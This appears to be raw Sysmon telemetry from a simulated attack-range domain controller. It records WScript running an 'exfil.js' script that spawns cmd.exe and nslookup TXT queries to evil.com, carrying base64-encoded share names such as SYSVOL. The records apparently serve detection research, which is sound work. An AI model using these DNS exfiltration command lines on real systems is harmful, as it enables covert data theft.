14:21:25.349{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-B042-000000005F02}7992C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.349{2E1864BB-18E5-629A-B042-000000005F02}79926496C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-AF42-000000005F02}7192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.334{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-B042-000000005F02}7992C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.318{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.318{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.318{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.318{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.318{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-AF42-000000005F02}7192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.318{2E1864BB-18E0-629A-6742-000000005F02}39767692C:\Windows\System32\WScript.exe{2E1864BB-18E5-629A-AF42-000000005F02}7192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.330{2E1864BB-18E5-629A-AF42-000000005F02}7192C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltcg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.318{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnfrn.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000206573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.302{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E2A817B6286F380C52B7AF87FFBDC7B,SHA256=7318B660D8D2580C4330DA9BDDF177631FFCB6AE722AA952C948872445887959,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.287{2E1864BB-18E5-629A-AD42-000000005F02}37362864C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-AE42-000000005F02}7620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.287{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.287{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.287{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.287{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-AE42-000000005F02}7620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.287{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.287{2E1864BB-18E5-629A-AC42-000000005F02}74884592C:\Windows\system32\cmd.exe{2E1864BB-18E5-629A-AE42-000000005F02}7620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.298{2E1864BB-18E5-629A-AE42-000000005F02}7620C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E5-629A-AC42-000000005F02}7488C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnfrn.tmp 2>&1 10341000x8000000000000000206564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.271{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-AD42-000000005F02}3736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.271{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-AD42-000000005F02}3736C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.271{2E1864BB-18E5-629A-AD42-000000005F02}37362864C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-AC42-000000005F02}7488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.267{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-AD42-000000005F02}3736C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.249{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.249{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.249{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.249{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-AC42-000000005F02}7488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.249{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.249{2E1864BB-18E0-629A-6742-000000005F02}39764672C:\Windows\System32\WScript.exe{2E1864BB-18E5-629A-AC42-000000005F02}7488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.261{2E1864BB-18E5-629A-AC42-000000005F02}7488C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnfrn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.249{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmwwgr.tmpMD5=88CB44002509C6BB2D4BC0ADC4A5E028,SHA256=FA57CD8CDA118516C9A4FB97A60BCAFFDFC289CB501CF1DABE54CCC933EB8213,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 